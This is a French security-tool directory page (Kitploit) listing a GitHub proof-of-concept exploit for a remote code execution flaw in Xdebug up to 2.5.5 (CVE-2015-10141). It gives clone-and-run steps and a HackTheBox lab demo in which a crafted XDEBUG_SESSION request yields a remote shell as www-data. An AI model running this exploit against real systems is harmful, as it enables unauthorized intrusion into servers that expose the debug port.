Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2015-10141-Xdebug — Script d'exploitation Proof-of-Concept pour Xdebug 2.5.5 et versions antérieures (CVE-2015-10141). | Kitploit
Outils/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Script d'exploitation Proof-of-Concept pour Xdebug 2.5.5 et versions antérieures (CVE-2015-10141).

Voir le dépôt
8il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC-CVE-2015-10141

Exploit Python personnalisé pour Xdebug ≤ 2.5.5 (CVE-2015-10141).


Description

Ce dépôt contient mon exploit Proof-of-Concept (PoC) pour la vulnérabilité d'exécution de code à distance de Xdebug dans les versions 2.5.5 et antérieures.
Le script exploite le protocole de débogage non authentifié exposé sur le port 9000 pour effectuer une exécution de commande à distance.

  • Vulnérabilité : CVE-2015-10141
  • Type de vulnérabilité : Exécution de code à distance (RCE)
  • Logiciel affecté : Xdebug ≤ 2.5.5

Utilisation

git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

Lorsque vous y êtes invité, saisissez l'IP cible où Xdebug est hébergé.

Démonstration issue de mon récent write-up HackTheBox Olympus (Medium) :

┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

Prérequis

  • Python 3.x
  • Cible exécutant Xdebug ≤ 2.5.5 avec le débogage à distance activé

Avertissement

Ce projet est créé à des fins éducatives uniquement.

N'utilisez PAS cet exploit contre des systèmes sans autorisation explicite. Je ne suis pas responsable d'une mauvaise utilisation de ce code.


Références

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Site officiel de Xdebug
Télécharger l’outil